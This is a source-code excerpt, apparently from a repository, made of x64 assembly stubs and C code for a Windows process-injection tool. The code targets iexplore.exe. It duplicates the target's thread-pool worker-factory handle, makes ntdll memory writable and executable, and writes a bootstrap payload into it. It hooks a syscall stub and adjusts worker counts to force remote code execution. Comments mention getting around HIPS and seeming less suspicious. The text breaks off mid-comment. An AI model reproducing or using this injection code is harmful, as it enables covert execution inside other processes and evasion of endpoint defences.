isamd64: 50 | 51 | push rcx 52 | push rdx 53 | sub rsp, 20h 54 | ;lea rcx, NtSuspendProcess ;(this is Not pic code!) 
55 | ;int 3 56 | 57 | call fpCreatePayloadThread 58 | createPayloadThreadBegin ENDP 59 | mov r11, rsp 60 | sub rsp, 68h 61 | xor eax, eax 62 | lea rdx, [r11+10h] 63 | mov qword ptr [r11-10h], rax 64 | xor r9d, r9d 65 | mov qword ptr [r11-18h], rax 66 | mov r8d, 1fffffh 67 | mov qword ptr [r11-20h], rax 68 | mov qword ptr [r11-28h], rax 69 | mov qword ptr [r11-30h], rax 70 | or rax, -1 71 | mov qword ptr [r11-38h], rax 72 | mov qword ptr [r11-48h], rax 73 | mov rcx, qword ptr [ldrInitializeThunkAddr] 74 | lea rax, looop 75 | sub rax, rcx 76 | sub rax, 5 77 | mov byte ptr [r11-40h], 0E9h 78 | mov dword ptr [r11-3Fh], eax 79 | mov rax, rcx 80 | mov rcx, qword ptr [rcx] 81 | mov qword ptr [originalLdrInitThunk], rcx 82 | mov rcx, qword ptr [r11-40h] 83 | lock xchg qword ptr [rax], rcx 84 | db 0B9h 85 | ntCreateThreadExNumber PROC 86 | dd 0DDDDDDDDh 87 | ntCreateThreadExNumber ENDP 88 | call syscallStub 89 | add rsp, 68h 90 | ret 91 | fpCreatePayloadThread ENDP 92 | 93 | 94 | add rsp, 20h 95 | pop rdx 96 | pop rcx 97 | ret 98 | ;fpBootstrapRoutine ENDP 99 | 100 | syscallStub PROC 101 | mov eax, ecx 102 | mov r10, rdx 103 | mov rdx, r8 104 | mov r8, r9 105 | mov r9, qword ptr [rsp+28h] 106 | add rsp, 8h 107 | nop 108 | syscall 109 | sub rsp, 8h 110 | ret 111 | syscallStub ENDP 112 | 113 | fpCreatePayloadThread PROC 114 | createPayloadThreadBegin PROC 115 | createPayloadThreadBegin ENDP 116 | mov r11, rsp 117 | sub rsp, 68h 118 | xor eax, eax 119 | lea rdx, [r11+10h] 120 | mov qword ptr [r11-10h], rax 121 | xor r9d, r9d 122 | mov qword ptr [r11-18h], rax 123 | mov r8d, 1fffffh 124 | mov qword ptr [r11-20h], rax 125 | mov qword ptr [r11-28h], rax 126 | mov qword ptr [r11-30h], rax 127 | or rax, -1 128 | mov qword ptr [r11-38h], rax 129 | mov qword ptr [r11-48h], rax 130 | mov rcx, qword ptr [ldrInitializeThunkAddr] 131 | lea rax, looop 132 | sub rax, rcx 133 | sub rax, 5 134 | mov byte ptr [r11-40h], 0E9h 135 | mov dword ptr [r11-3Fh], eax 136 | mov rax, rcx 137 | mov rcx, 
qword ptr [rcx] 138 | mov qword ptr [originalLdrInitThunk], rcx 139 | mov rcx, qword ptr [r11-40h] 140 | lock xchg qword ptr [rax], rcx 141 | db 0B9h 142 | ntCreateThreadExNumber PROC 143 | dd 0DDDDDDDDh 144 | ntCreateThreadExNumber ENDP 145 | call syscallStub 146 | add rsp, 68h 147 | ret 148 | fpCreatePayloadThread ENDP 149 | createPayloadThreadEnd PROC 150 | createPayloadThreadEnd ENDP 151 | ldrInitializeThunkAddr PROC 152 | dq 0CCCCCCCCCCCCCCCCh ;;&ntdll!LdrInitializeThunk 153 | ldrInitializeThunkAddr ENDP 154 | ntdllRxBasePriv: 155 | ntdllRxBaseAddr PROC 156 | dq 1111111111111111h ;;pNtdllRxBase 157 | ntdllRxBaseAddr ENDP 158 | protSizePriv: 159 | protSize PROC 160 | dq 5555555555555555h ;;bytesToProtect 161 | protSize ENDP 162 | origProtPriv: 163 | origProt PROC 164 | dd 44444444h ;;oldProt 165 | origProt ENDP 166 | originalLdrInitThunk dq 9999999999999999h 167 | looop: 168 | mov rax, qword ptr [originalLdrInitThunk] 169 | mov rcx, qword ptr [ldrInitializeThunkAddr] 170 | lock xchg qword ptr [rcx], rax 171 | sub rsp, 50h 172 | or rdx, -1 173 | mov rax, qword ptr [ntdllRxBasePriv] 174 | mov [rsp+38h], rax 175 | lea r8, [rsp+38h] 176 | mov rax, qword ptr [protSizePriv] 177 | mov [rsp+40h], rax 178 | lea r9, [rsp+40h] 179 | mov ecx, dword ptr [origProtPriv] 180 | mov dword ptr [rsp+20h], ecx 181 | lea rcx, [rsp+30h] 182 | mov qword ptr [rsp+28h], rcx 183 | db 0B9h 184 | ntProtectVirtMemNumber PROC 185 | dd 033333333h ;;((PNT_SYSCALL_STUB)&NtProtectVirtualMemory)->syscallNr 186 | ntProtectVirtMemNumber ENDP 187 | call syscallStub 188 | add rsp, 50h 189 | ;status = NtProtectVirtualMemory(hProcess, &pNtdllRxBegin, &bytesToProtect, PAGE_EXECUTE_READWRITE, &oldHookProtect); 190 | loooop: 191 | jmp loooop 192 | bootstrapRoutineEnd PROC 193 | bootstrapRoutineEnd ENDP 194 | ;fpCreatePayloadThread: 195 | END 196 | -------------------------------------------------------------------------------- /rtsectiontest/global.h: 
-------------------------------------------------------------------------------- 1 | #ifndef _GLOBAL_H_ 2 | #define _GLOBAL_H_ 3 | #define WIN32_NO_STATUS 4 | //#define _NO_CRT_STDIO_INLINE 5 | 6 | //#define BOOT_APP 7 | 8 | #if defined(BOOT_APP) 9 | #pragma comment(linker, "/SUBSYSTEM:NATIVE") 10 | #else 11 | #pragma comment(linker, "/SUBSYSTEM:WINDOWS") 12 | #endif 13 | 14 | //#define BOOTSCR_OUTPUT 15 | 16 | #include 17 | #include <..\ndk\ntndk.h> 18 | #include 19 | #include "auxfuncs.h" 20 | 21 | #endif -------------------------------------------------------------------------------- /rtsectiontest/main.c: -------------------------------------------------------------------------------- 1 | #include "global.h" 2 | 3 | #define TARGET_PROCESS_NAME L"iexplore.exe" 4 | #define NT_SYSCALL_START 0x0 ///System call numbers always started with 0. 5 | #define NT_SYSCALL_END 0x1000 ///0x1000 is the begin of win32k system calls and hence, the last possible NT syscall is 0xFFF. 6 | 7 | #define WORKER_FACTORY_ALL_ACCESS 0xF00FF 8 | 9 | typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX { 10 | PVOID Object; 11 | HANDLE UniqueProcessId; 12 | HANDLE HandleValue; 13 | ULONG GrantedAccess; 14 | USHORT CreatorBackTraceIndex; 15 | USHORT ObjectTypeIndex; 16 | ULONG HandleAttributes; 17 | ULONG Reserved; 18 | } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX; 19 | 20 | typedef struct _SYSTEM_HANDLE_INFORMATION_EX { 21 | ULONG_PTR NumberOfHandles; 22 | ULONG_PTR Reserved; 23 | SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1]; 24 | } SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX; 25 | 26 | typedef struct _WORKER_FACTORY_BASIC_INFORMATION { 27 | LARGE_INTEGER Timeout; 28 | LARGE_INTEGER RetryTimeout; 29 | LARGE_INTEGER IdleTimeout; 30 | BOOLEAN Paused; 31 | BOOLEAN TimerSet; 32 | BOOLEAN QueuedToExWorker; 33 | BOOLEAN MayCreate; 34 | BOOLEAN CreateInProgress; 35 | BOOLEAN InsertedIntoQueue; 36 | BOOLEAN Shutdown; 37 | ULONG BindingCount; 38 | ULONG 
ThreadMinimum; 39 | ULONG ThreadMaximum; 40 | ULONG PendingWorkerCount; 41 | ULONG WaitingWorkerCount; 42 | ULONG TotalWorkerCount; 43 | ULONG ReleaseCount; 44 | LONGLONG InfiniteWaitGoal; 45 | PVOID StartRoutine; 46 | PVOID StartParameter; 47 | HANDLE ProcessId; 48 | SIZE_T StackReserve; 49 | SIZE_T StackCommit; 50 | NTSTATUS LastThreadCreationStatus; 51 | } WORKER_FACTORY_BASIC_INFORMATION, *PWORKER_FACTORY_BASIC_INFORMATION; 52 | ///We define a generic system call structure which held true ever since Windows NT 3.51. 53 | typedef struct _NT_SYSCALL_STUB { 54 | BYTE movR64Rcx[3]; 55 | BYTE movR32Imm32; 56 | ULONG syscallNumber; 57 | USHORT intelSyscallInstruction; 58 | BYTE ret; 59 | BYTE nopPadding[5]; 60 | } NT_SYSCALL_STUB, *PNT_SYSCALL_STUB; 61 | 62 | static char pZeroBuf[3 * 1024]; 63 | 64 | //void dispError(NTSTATUS status) { 65 | // ULONGLONG dummy; 66 | // for (ULONG i = NT_SYSCALL_START; i < NT_SYSCALL_END; i++) { 67 | // dummy = 0; 68 | // syscallStub(i, status, 1, 0, (PULONG_PTR)&dummy, 0, (PULONG)&dummy); 69 | // } 70 | //} 71 | void dispError(NTSTATUS status) { 72 | ULONGLONG dummy; 73 | dummy = 0; 74 | NtRaiseHardError(status, 1, 0, (PULONG_PTR)&dummy, 0, (PULONG)&dummy); 75 | } 76 | 77 | NTSTATUS openWorkerFactory(PHANDLE pWorkerFactory, HANDLE hProcess, HANDLE targetPid) { 78 | NTSTATUS status = STATUS_UNSUCCESSFUL; 79 | HANDLE hLocalWorkerFactory = NULL; 80 | HANDLE hRemoteWorkerFactory = NULL; 81 | HANDLE hIoCompletion = NULL; 82 | static USHORT objIndex = 0; 83 | ULONG handleInfoSize = 0; 84 | SIZE_T handleInfoMemSize = 0; 85 | PSYSTEM_HANDLE_INFORMATION_EX pHandleList = NULL; 86 | SYSTEM_HANDLE_INFORMATION_EX handleInfo; 87 | 88 | do { 89 | if (!pWorkerFactory || !hProcess || INVALID_HANDLE_VALUE == hProcess || !targetPid) { 90 | status = STATUS_INVALID_PARAMETER; 91 | break; 92 | } 93 | 94 | *pWorkerFactory = NULL; 95 | 96 | if (!objIndex) { 97 | ///We need this for the next call, and the parameters are quite uncritical. 
98 | status = NtCreateIoCompletion(&hIoCompletion, IO_COMPLETION_ALL_ACCESS, NULL, 4); 99 | if (status) { 100 | hIoCompletion = NULL; 101 | break; 102 | } 103 | 104 | ///We create an archetypal TpWorkerFactory object in order to later deduce the object type from it... 105 | status = NtCreateWorkerFactory(&hLocalWorkerFactory, WORKER_FACTORY_ALL_ACCESS, NULL, hIoCompletion, INVALID_HANDLE_VALUE, NtCurrentPeb(), NtCurrentTeb(), 0x2, 0, 0); 106 | if (status) { 107 | hLocalWorkerFactory = NULL; 108 | break; 109 | } 110 | } 111 | 112 | status = NtQuerySystemInformation(SystemExtendedHandleInformation, &handleInfo, sizeof(SYSTEM_HANDLE_INFORMATION_EX), &handleInfoSize); 113 | if ((STATUS_BUFFER_TOO_SMALL != status) && (STATUS_BUFFER_OVERFLOW != status) && (STATUS_INFO_LENGTH_MISMATCH != status)) 114 | break; 115 | 116 | handleInfoMemSize = sizeof(SYSTEM_HANDLE_INFORMATION_EX) + handleInfo.NumberOfHandles * sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX); 117 | handleInfoMemSize += (handleInfoMemSize / 2); ///We should allocate much additional memory since the 118 | ///total system handle count may extremely fluctuate. 119 | ///If between the two information requests the handle count happens 120 | ///to largely rise we will have allocated memory to only hold handle info structs 121 | ///as much as the count was before the rise. Thus the safety margin. 122 | status = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &pHandleList, 0, &handleInfoMemSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 123 | if (status) { 124 | pHandleList = NULL; 125 | break; 126 | } 127 | 128 | handleInfoSize = (ULONG)handleInfoMemSize; 129 | ///Now retrieve the entire list of all handles currently opened on this system. 130 | ///The list contains not only the process which has opened the handle but also 131 | ///the handle value. Additionally it contains the type number of each object the handles are opened to. 
132 | status = NtQuerySystemInformation(SystemExtendedHandleInformation, pHandleList, handleInfoSize, &handleInfoSize); 133 | if (status) 134 | break; 135 | 136 | if (!objIndex) { 137 | ///Since we exactly know our pid as well as our WorkerFactory handle value 138 | ///we can exploit our local WorkerFactory in order to figure out the TpWorkerFactory object type. 139 | ///Kind of workaround for NtQueryObject(ObjectTypeInformation) since this call doesn't provide useful info. 140 | for (ULONG i = 0; i < pHandleList->NumberOfHandles; i++) { 141 | if (NtCurrentTeb()->ClientId.UniqueProcess == pHandleList->Handles[i].UniqueProcessId) { 142 | if (hLocalWorkerFactory == pHandleList->Handles[i].HandleValue) { 143 | objIndex = pHandleList->Handles[i].ObjectTypeIndex; 144 | break; 145 | } 146 | } 147 | } 148 | 149 | if (0 == objIndex) { ///Assumption 0 is invalid object type 150 | status = STATUS_OBJECTID_NOT_FOUND; 151 | break; 152 | } 153 | } 154 | 155 | ///Now check for any handles incorporating the determined TpWorkerFactory object id and at the 156 | ///same time time existing in our target process 157 | for (ULONG i = 0; i < pHandleList->NumberOfHandles; i++) { 158 | if (targetPid == pHandleList->Handles[i].UniqueProcessId) { 159 | if (objIndex == pHandleList->Handles[i].ObjectTypeIndex) { 160 | ///Now clone the TpWorkerFactory handle into ourselves so we can remote control the corresponding thread pool. 
161 | status = NtDuplicateObject(hProcess, pHandleList->Handles[i].HandleValue, INVALID_HANDLE_VALUE, &hRemoteWorkerFactory, WORKER_FACTORY_ALL_ACCESS, OBJ_CASE_INSENSITIVE, 0); 162 | if (!status) 163 | break; 164 | } 165 | } 166 | } 167 | if (!hRemoteWorkerFactory) { 168 | status = STATUS_OBJECT_NOT_EXTERNALLY_BACKED; 169 | break; 170 | } 171 | 172 | *pWorkerFactory = hRemoteWorkerFactory; 173 | } while (status); 174 | 175 | if (hLocalWorkerFactory) 176 | NtClose(hLocalWorkerFactory); 177 | 178 | if (hIoCompletion) 179 | NtClose(hIoCompletion); 180 | 181 | if (pHandleList) 182 | NtFreeVirtualMemory(INVALID_HANDLE_VALUE, &pHandleList, &handleInfoMemSize, MEM_RELEASE); 183 | 184 | return status; 185 | } 186 | 187 | ///Given a valid RVA and the base address of a buffer that holds an image in its on-disk (file) layout, 188 | ///returns a pointer to the matching file offset, which is therefore also a valid pointer into that 189 | ///buffer. Returns NULL when the RVA lies outside every section. 190 | PVOID rvaToFileOffset(_In_ ULONG rva, _In_ PVOID pMemoryBase) { 191 | PIMAGE_NT_HEADERS pNtdllPeHdr = (PIMAGE_NT_HEADERS)((PUCHAR)pMemoryBase + ((PIMAGE_DOS_HEADER)pMemoryBase)->e_lfanew); 192 | PIMAGE_SECTION_HEADER pFirstSecHdr = IMAGE_FIRST_SECTION(pNtdllPeHdr); 193 | for (ULONG i = 0; i < pNtdllPeHdr->FileHeader.NumberOfSections; i++) { 194 | if ((pFirstSecHdr[i].VirtualAddress <= rva) && (rva < pFirstSecHdr[i].VirtualAddress + pFirstSecHdr[i].Misc.VirtualSize)) 195 | return (PUCHAR)pMemoryBase + rva + pFirstSecHdr[i].PointerToRawData - pFirstSecHdr[i].VirtualAddress; 196 | } 197 | return NULL; 198 | } 199 | 200 | #define MIN_VM_ACCESS_MASK ( PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION) 201 | 202 | NTSTATUS injectIntoProcess(HANDLE hProcess, HANDLE hRemoteWorkerFactory, ULONGLONG injectionHookAddress, DWORD timeoutMilliseconds){ 203 | LARGE_INTEGER interval; 204 | SIZE_T bytesWritten; 205 | ULONG oldHookProtect = 0x0; 206 | PVOID pNtdllRxBegin = NULL; 207 | NTSTATUS status = 
STATUS_UNSUCCESSFUL; 208 | ULONGLONG payloadAddress; 209 | SIZE_T bytesToProtect = PAGE_SIZE; 210 | NT_SYSCALL_STUB originalSyscallStub = *(PNT_SYSCALL_STUB)injectionHookAddress; 211 | ULONG callDisplacement; 212 | unsigned char pReadBuffer[8]; 213 | //signed someValue = 23; 214 | //USHORT lineNum = 0; 215 | //HANDLE hHandle = hRemoteWorkerFactory; 216 | 217 | interval.QuadPart = timeoutMilliseconds * (long long)(-10000); 218 | do { 219 | bytesToProtect = 1008 * 1024; 220 | pNtdllRxBegin = (PVOID)(0x1000 + (ULONGLONG)((PLDR_DATA_TABLE_ENTRY)((PLDR_DATA_TABLE_ENTRY)NtCurrentPeb()->Ldr->InLoadOrderModuleList.Flink)->InLoadOrderLinks.Flink)->DllBase); 221 | payloadAddress = (ULONGLONG)pNtdllRxBegin + bytesToProtect - 3 * 1024; 222 | callDisplacement = (ULONG)(payloadAddress - injectionHookAddress - 5); 223 | *(PULONG)((PUCHAR)&injectionCode + 1) = callDisplacement; 224 | originalSyscallCode = *(PULONG_PTR)injectionHookAddress; 225 | ntCreateThreadExNumber = ((PNT_SYSCALL_STUB)NtCreateThreadEx)->syscallNumber; 226 | ntProtectVirtMemNumber = ((PNT_SYSCALL_STUB)NtProtectVirtualMemory)->syscallNumber; 227 | ldrInitializeThunkAddr = (ULONG_PTR)&LdrInitializeThunk; 228 | protSize = bytesToProtect; 229 | ntdllRxBaseAddr = (ULONG_PTR)pNtdllRxBegin; 230 | 231 | //NtDuplicateObject(hProcess, (HANDLE)0x2c, INVALID_HANDLE_VALUE, &hHandle, 0xF00FF, OBJ_CASE_INSENSITIVE, 0); 232 | 233 | 234 | status = NtProtectVirtualMemory(hProcess, &pNtdllRxBegin, &bytesToProtect, PAGE_EXECUTE_READWRITE, &oldHookProtect); 235 | if (status) 236 | break; 237 | 238 | origProt = oldHookProtect; 239 | status = NtWriteVirtualMemory(hProcess, (PVOID)payloadAddress, &bootstrapRoutineBegin, (SIZE_T)&bootstrapRoutineEnd - (SIZE_T)&bootstrapRoutineBegin, &bytesWritten); 240 | if (status) 241 | break; 242 | 243 | NtSuspendProcess(hProcess); 244 | status = NtWriteVirtualMemory(hProcess, (PVOID)injectionHookAddress, &injectionCode, sizeof(ULONG_PTR), &bytesWritten); 245 | if (status) { 246 | 
NtResumeProcess(hProcess); 247 | break; 248 | } 249 | WORKER_FACTORY_BASIC_INFORMATION workerFactoryBasicInfo; 250 | ULONG workerMinimum = 0; 251 | ULONG workerMaximum = 0; 252 | ULONG returnLen = 0; 253 | status = NtQueryInformationWorkerFactory(hRemoteWorkerFactory, WorkerFactoryBasicInformation, &workerFactoryBasicInfo, sizeof(WORKER_FACTORY_BASIC_INFORMATION), &returnLen); 254 | if (status) 255 | break; 256 | //{ 257 | // //myWPrintf(&lineNum, L"%d", returnLen); 258 | // NtRaiseHardError(status, 0, 0, NULL, 0, (PULONG)&status); 259 | //} 260 | 261 | workerMinimum = workerFactoryBasicInfo.TotalWorkerCount + 1; 262 | if (workerFactoryBasicInfo.ThreadMaximum < workerMinimum) { 263 | workerMaximum = workerMinimum + 1; 264 | status = NtSetInformationWorkerFactory(hRemoteWorkerFactory, WorkerFactoryThreadMaximum, &workerMaximum, sizeof(ULONG)); 265 | if (status) 266 | break; 267 | //continue; ///This WorkerFactory is strange. 268 | } 269 | //NtSuspendProcess(hProcess); 270 | //myWPrintf(&lineNum, L"Total count: %d", workerFactoryBasicInfo.TotalWorkerCount); 271 | //myWPrintf(&lineNum, L"Worker maximum: %d", workerFactoryBasicInfo.ThreadMaximum); 272 | //NtSuspendProcess(hProcess); 273 | status = NtSetInformationWorkerFactory(hRemoteWorkerFactory, WorkerFactoryThreadMinimum, &workerMinimum, sizeof(ULONG)); ///Finally trigger remote code execution. 
274 | //if (!status) { 275 | // flag = TRUE; 276 | // break; 277 | //} 278 | ////NtResumeProcess(hProcess); 279 | //if (status) 280 | // break; 281 | 282 | //NtReleaseWorkerFactoryWorker(hHandle); 283 | NtDelayExecution(FALSE, &interval); 284 | 285 | status = NtReadVirtualMemory(hProcess, (PVOID)injectionHookAddress, pReadBuffer, sizeof(pReadBuffer), &bytesWritten); 286 | if (status) 287 | break; 288 | 289 | if (mymemcmp(pReadBuffer, &injectionCode, sizeof(pReadBuffer))){ 290 | NtSuspendProcess(hProcess); 291 | NtWriteVirtualMemory(hProcess, (PVOID)injectionHookAddress, &originalSyscallStub, sizeof(NT_SYSCALL_STUB), &bytesWritten); 292 | NtResumeProcess(hProcess); 293 | 294 | //for (int i = 0; i < ((SIZE_T)&bootstrapRoutineEnd - (SIZE_T)&bootstrapRoutineBegin); i++) 295 | //(&bootstrapRoutineBegin)[i] = 0x0; 296 | NtWriteVirtualMemory(hProcess, (PVOID)payloadAddress, pZeroBuf, sizeof(pZeroBuf), &bytesWritten); 297 | NtProtectVirtualMemory(hProcess, &pNtdllRxBegin, &bytesToProtect, oldHookProtect, &oldHookProtect); 298 | status = STATUS_UNSUCCESSFUL; 299 | break; 300 | } 301 | } while (status); 302 | 303 | //if (oldHookProtect) 304 | 305 | 306 | //if(oldPayloadProtect) 307 | // NtProtectVirtualMemory(hProcess, &pPayloadBase, &bytesToProtect, oldPayloadProtect, &oldPayloadProtect); 308 | 309 | 310 | 311 | //if (status) 312 | // dispError(status); 313 | 314 | return status; 315 | } 316 | 317 | NTSTATUS openProcsByName(PHANDLE pProcess, PUNICODE_STRING pProcName, BOOLEAN useDebugPrivilege) { 318 | SYSTEM_PROCESS_INFORMATION procInfo; 319 | //OBJECT_ATTRIBUTES procAttr; 320 | OBJECT_BASIC_INFORMATION processHandleInfo; 321 | CLIENT_ID cid; 322 | BOOLEAN oldValue; 323 | HANDLE pid; 324 | BOOLEAN injectionSucceeded = FALSE; 325 | NTSTATUS status = STATUS_CACHE_PAGE_LOCKED; 326 | ULONG procListSize = 0; 327 | ULONGLONG memSize = 0; 328 | ULONG obQueryLen = 0; 329 | PVOID pProcListHead = NULL; 330 | PSYSTEM_PROCESS_INFORMATION pProcEntry = NULL; 331 | HANDLE hProcess = 
NULL; 332 | 333 | if (!pProcName || !pProcess ) 334 | return STATUS_INVALID_PARAMETER; 335 | 336 | *pProcess = NULL; 337 | 338 | ///Since we specify a buffer size of 0 the buffer must overflow for sure even if there was running a 339 | ///single process only. If we don't receive the dedicated error, something other has gone wrong 340 | ///and we cannot rely on the return length. 341 | status = NtQuerySystemInformation(SystemProcessInformation, &procInfo, procListSize, &procListSize); 342 | if (STATUS_INFO_LENGTH_MISMATCH != status) 343 | return status; 344 | 345 | memSize = PAGE_ROUND_UP(procListSize) + PAGE_SIZE; ///We better allocate one page extra 346 | ///since between our "test" call and the real call below 347 | ///additional processes might be started. (race condition) 348 | status = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &pProcListHead, 0, &memSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 349 | if (status) 350 | return status; 351 | 352 | //status = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, (PVOID*)ppHandleTable, 0, &memSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); 353 | //if (status) 354 | // return status; 355 | ///By now, we have allocated a buffer large enough for the complete process list, 356 | ///even if some new processes have been started in the mean time. 357 | ///Hence, the next call is entirely expected to succeed. 
358 | procListSize = (ULONG)memSize; 359 | status = NtQuerySystemInformation(SystemProcessInformation, pProcListHead, procListSize, &procListSize); 360 | if (status) { 361 | memSize = 0; 362 | NtFreeVirtualMemory(INVALID_HANDLE_VALUE, &pProcListHead, &memSize, MEM_RELEASE); 363 | return status; 364 | } 365 | 366 | HANDLE hWorkerFactory = NULL; 367 | OBJECT_ATTRIBUTES procAtttr; 368 | InitializeObjectAttributes(&procAtttr, NULL, 0, NULL, NULL); 369 | pid = NULL; 370 | cid.UniqueProcess = NULL; 371 | cid.UniqueThread = NULL; 372 | pProcEntry = pProcListHead; ///The list of all system processes is a so called singly linked list. 373 | 374 | if (useDebugPrivilege) { 375 | status = RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &oldValue); 376 | if (status) ///Since we're for some reason supposed to use the SeDebugPrivilege, 377 | return status; ///we fail deliberately if we can't enable it. 378 | } 379 | while (pProcEntry->NextEntryOffset) { ///If NextEntryOffset member is NULL, we have reached the list end (tail). 380 | pProcEntry = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)pProcEntry + pProcEntry->NextEntryOffset); 381 | //DebugPrint2A("PID: %d, %wZ", pProcEntry->UniqueProcessId, pProcEntry->ImageName); 382 | if (0 == RtlCompareUnicodeString(pProcName, &pProcEntry->ImageName, TRUE)) { 383 | cid.UniqueProcess = pProcEntry->UniqueProcessId; 384 | if (hProcess) 385 | NtClose(hProcess); 386 | 387 | status = NtOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &procAtttr, &cid); 388 | if (status) { 389 | hProcess = NULL; 390 | continue; 391 | } 392 | 393 | status = NtQueryObject(hProcess, ObjectBasicInformation, &processHandleInfo, sizeof(OBJECT_BASIC_INFORMATION), &obQueryLen); 394 | if (status) ///Not sure if this call ever will fail... 395 | continue; 396 | 397 | ///Maybe, HIPS just wanted to deny PROCESS_TERMINATE/PROCESS_SUSPEND right? 398 | ///If so, we don't care. We're only interested in VM rights. 
399 | if ((MIN_VM_ACCESS_MASK | PROCESS_DUP_HANDLE) & ~processHandleInfo.GrantedAccess) 400 | continue; 401 | 402 | status = openWorkerFactory(&hWorkerFactory, hProcess, cid.UniqueProcess); 403 | if (status) 404 | continue; 405 | 406 | status = injectIntoProcess(hProcess, hWorkerFactory, (ULONGLONG)&NtWaitForWorkViaWorkerFactory, 150); 407 | if (!status) { 408 | injectionSucceeded = TRUE; 409 | break; 410 | } 411 | } 412 | } 413 | 414 | if (injectionSucceeded) 415 | status = STATUS_SUCCESS; 416 | 417 | memSize = 0; 418 | NtFreeVirtualMemory(INVALID_HANDLE_VALUE, &pProcListHead, &memSize, MEM_RELEASE); ///We don't need the list anymore. 419 | 420 | if (!cid.UniqueProcess) 421 | return STATUS_OBJECT_NAME_NOT_FOUND; 422 | 423 | if(hProcess) 424 | NtClose(hProcess); 425 | 426 | return status; 427 | } 428 | 429 | 430 | 431 | void mymain(void){ 432 | NTSTATUS status = STATUS_PENDING; 433 | HANDLE hProcess = INVALID_HANDLE_VALUE; 434 | UNICODE_STRING uProcess; 435 | OBJECT_ATTRIBUTES thrdAttr; 436 | //CLIENT_ID cid; 437 | //HANDLE hCompletion = INVALID_HANDLE_VALUE; 438 | OBJECT_ATTRIBUTES completionAttr; 439 | //SIZE_T memSize = 0; 440 | LARGE_INTEGER interval; 441 | //PHANDLE pPidList = NULL; 442 | 443 | uProcess.Buffer = TARGET_PROCESS_NAME; 444 | uProcess.Length = sizeof(TARGET_PROCESS_NAME) - sizeof(UNICODE_NULL); 445 | uProcess.MaximumLength = sizeof(TARGET_PROCESS_NAME); 446 | InitializeObjectAttributes(&thrdAttr, NULL, 0, NULL, NULL); 447 | InitializeObjectAttributes(&completionAttr, NULL, 0, NULL, NULL); 448 | ///The requested operation waits until you click a button. 
449 | dispError(STATUS_PENDING); 450 | interval.QuadPart = -20000000; 451 | do { 452 | //do { 453 | status = openProcsByName(&hProcess, &uProcess, FALSE); 454 | //NtDelayExecution(FALSE, &interval); 455 | //} while (!status); 456 | 457 | dispError(status); 458 | if (status) 459 | break; 460 | ////NtTimer 461 | ////if (status) 462 | //// break; 463 | // 464 | ////NtGetC 465 | //cid.UniqueProcess = (HANDLE)5836; 466 | //cid.UniqueThread = (HANDLE)5840; 467 | //status = NtCreateIoCompletion(&hCompletion, IO_COMPLETION_ALL_ACCESS, &completionAttr, 2); 468 | //if (status) 469 | // break; 470 | // 471 | //status = NtCreateWorkerFactory(&hProcess, SYNCHRONIZE, &completionAttr, hCompletion, INVALID_HANDLE_VALUE, (PUCHAR)RtlSetProcessIsCritical+3, (PVOID)NtAcceptConnectPort, 70, 1024*PAGE_SIZE, PAGE_SIZE); 472 | //if (status) 473 | // break; 474 | //////status = NtGetNextThread(hProcess, NULL, THREAD_ALL_ACCESS, OBJ_CASE_INSENSITIVE, 0, &hProcess); 475 | //////status = NtOpenThread(&hProcess, THREAD_ALL_ACCESS, &thrdAttr, &cid); 476 | //// 477 | //////status = NtQueueApcThreadEx(hProcess, NULL, (PVOID)RtlSetProcessIsCritical, NULL, NULL, NULL); 478 | ////if (status) 479 | //// break; 480 | 481 | //dispError(STATUS_XML_ENCODING_MISMATCH); 482 | } while (status); 483 | 484 | //if (*pPidList) 485 | // NtFreeVirtualMemory(INVALID_HANDLE_VALUE, &pPidList, &memSize, MEM_RELEASE); 486 | 487 | //if (status) 488 | // dispError(status); 489 | 490 | //dispError(status); 491 | 492 | 493 | //NtQueueApcThreadEx() 494 | //rvaToFileOffset() 495 | ////selfUnmap(); 496 | /////No image (except the own one) can be found... 497 | ////dispError(STATUS_SECTION_NOT_IMAGE); 498 | 499 | /////Initialize everything... 
500 | ////status = initializeSyscallTable(); 501 | ////if (status) { 502 | //// dispError(status); 503 | //// return; 504 | ////} 505 | //////DebugPrint2A("%wZ pid = %llu", *pProcName, pid); 506 | 507 | //////{ 508 | ////// NtClose(*pProcess); 509 | ////// *pProcess = NULL; 510 | ////// return STATUS_UNSUCCESSFUL; 511 | //////} 512 | //////{ 513 | ////// NtClose(*pProcess); 514 | //////// *pProcess = NULL; 515 | //////// return status; 516 | ////////} 517 | 518 | 519 | 520 | 521 | 522 | ////dispError(status); 523 | 524 | //////status = injectIntoProcess(hProcess, hWorkerFactory, (ULONGLONG)&NtWaitForMultipleObjects, 200); 525 | //////if (!status) { 526 | ////// NtClose(hProcess); 527 | ////// break; 528 | //////} 529 | //////status = injectIntoProcess(hProcess, (ULONGLONG)&NtQueryValueKey, 3000); 530 | //////NtClose(hProcess); 531 | //// 532 | //////if (!status) 533 | ////// break; 534 | 535 | ////InitializeObjectAttributes(&procAttr, NULL, 0, NULL, NULL); 536 | ////cid.UniqueThread = (HANDLE)0; 537 | ////cid.UniqueProcess = pid; 538 | ///////Opening a process for full access might be less suspicious than opening with our real intentions. 539 | ////status = NtOpenProcess(pProcess, PROCESS_ALL_ACCESS, &procAttr, &cid); 540 | 541 | //if (useDebugPrivilege) 542 | // ///We don't have any clue if the privilege already was enabled, 543 | // ///so we simply restore the old status. Whether we do this call or not 544 | // ///isn't anyhow related to the result of process opening. 545 | // RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, oldValue, FALSE, &oldValue); 546 | 547 | ////if (status) 548 | //// return status; ///Most likely STATUS_ACCESS_DENIED if 549 | //// ///either we didn't specify the 